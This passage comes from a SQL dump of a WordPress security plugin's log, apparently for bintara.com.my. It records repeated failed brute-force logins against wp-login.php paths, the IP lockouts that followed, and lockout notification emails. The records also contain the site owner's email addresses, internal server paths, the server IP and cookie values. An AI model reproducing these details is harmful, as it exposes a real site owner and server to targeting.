empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=d1fe8c94a2184bd96e7d8d8bd9092303\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZB5HkXpgmG5P@iB8lHGAAAAJI\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"45.118.145.84\";s:11:\"REMOTE_PORT\";s:5:\"34698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZB5HkXpgmG5P@iB8lHGAAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079780.3652\";s:12:\"REQUEST_TIME\";s:10:\"1569079780\";}}','notice','2019-09-21 15:29:42','2019-09-21 15:29:40',27568400,29119136,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26665,0,'lockout','host-lockout::45.118.145.84','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"45.118.145.84\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:29:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:29:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:29:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:29:40\";s:12:\"lockout_host\";s:13:\"45.118.145.84\";}','action','2019-09-21 15:29:42','2019-09-21 15:29:40',27650768,29119136,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26666,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"45.118.145.84\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:29:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:29:40\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:29:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:29:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:29:42','2019-09-21 15:29:40',27650832,29119136,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26667,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:29:42','2019-09-21 15:29:40',28012400,29119136,'https://bintara.com.my/test/wp-login.php',1,0,'45.118.145.84'),(26668,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b67250c4984ca31d42853ce359079f6f\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZB-EnlR@6WyRVzpiDtfgAAAAc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"37742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZB-EnlR@6WyRVzpiDtfgAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079804.1589\";s:12:\"REQUEST_TIME\";s:10:\"1569079804\";}}','notice','2019-09-21 15:30:06','2019-09-21 15:30:04',27568400,29119136,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.12.18'),(26669,0,'lockout','host-lockout::159.203.12.18','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"159.203.12.18\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:30:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:30:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:30:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:30:04\";s:12:\"lockout_host\";s:13:\"159.203.12.18\";}','action','2019-09-21 15:30:06','2019-09-21 15:30:04',27650768,29119136,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.12.18'),(26670,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"159.203.12.18\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:30:04\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:30:04\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:30:04\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:30:04\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:30:06','2019-09-21 15:30:04',27650832,29119136,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.12.18'),(26671,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:30:06','2019-09-21 15:30:04',28012400,29119136,'https://bintara.com.my/blog/wp-login.php',1,0,'159.203.12.18'),(26672,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=b4f5adac3a35d01f7ce9e533488a3843\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZB-knlR@6WyRVzpiDtfwAAABY\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"88.208.229.214\";s:11:\"REMOTE_PORT\";s:5:\"34982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZB-knlR@6WyRVzpiDtfwAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079806.1995\";s:12:\"REQUEST_TIME\";s:10:\"1569079806\";}}','notice','2019-09-21 15:30:08','2019-09-21 15:30:06',27568232,29122496,'https://bintara.com.my/wp/wp-login.php',1,0,'88.208.229.214'),(26673,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:30:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:30:06\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:30:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:30:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:30:08','2019-09-21 15:30:06',27649936,29122496,'https://bintara.com.my/wp/wp-login.php',1,0,'88.208.229.214'),(26674,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:30:08','2019-09-21 15:30:06',28010976,29122496,'https://bintara.com.my/wp/wp-login.php',1,0,'88.208.229.214'),(26675,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=9137f52d0ac081a59a52aaf7d2a82ff6\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZCSUnlR@6WyRVzpiDt@QAAAAo\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.171.46\";s:11:\"REMOTE_PORT\";s:5:\"15986\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZCSUnlR@6WyRVzpiDt@QAAAAo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079881.7042\";s:12:\"REQUEST_TIME\";s:10:\"1569079881\";}}','notice','2019-09-21 15:31:24','2019-09-21 15:31:22',27569240,29124136,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.171.46'),(26676,0,'lockout','host-lockout::139.59.171.46','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"139.59.171.46\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:31:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:31:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:31:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:31:22\";s:12:\"lockout_host\";s:13:\"139.59.171.46\";}','action','2019-09-21 15:31:24','2019-09-21 15:31:22',27652280,29124136,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.171.46'),(26677,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"139.59.171.46\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:31:22\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:31:22\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:31:22\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:31:22\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:31:24','2019-09-21 15:31:22',27652200,29124136,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.171.46'),(26678,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:31:24','2019-09-21 15:31:22',28014184,29124136,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.171.46'),(26679,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=eedb71e313ead415b9e8a5eee750d4c2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYZCTHkXpgmG5P@iB8lHOAAAAI0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.159.216\";s:11:\"REMOTE_PORT\";s:5:\"45132\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYZCTHkXpgmG5P@iB8lHOAAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569079885.0268\";s:12:\"REQUEST_TIME\";s:10:\"1569079885\";}}','notice','2019-09-21 15:31:28','2019-09-21 15:31:25',27566824,29117288,'https://bintara.com.my/wordpress/wp-login.php',1,0,'134.209.159.216'),(26680,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:31:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:31:25\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:31:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:31:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:31:28','2019-09-21 15:31:25',27648360,29117288,'https://bintara.com.my/wordpress/wp-login.php',1,0,'134.209.159.216'),(26681,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:31:28','2019-09-21 15:31:25',28009152,29117288,'https://bintara.com.my/wordpress/wp-login.php',1,0,'134.209.159.216'),(26682,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 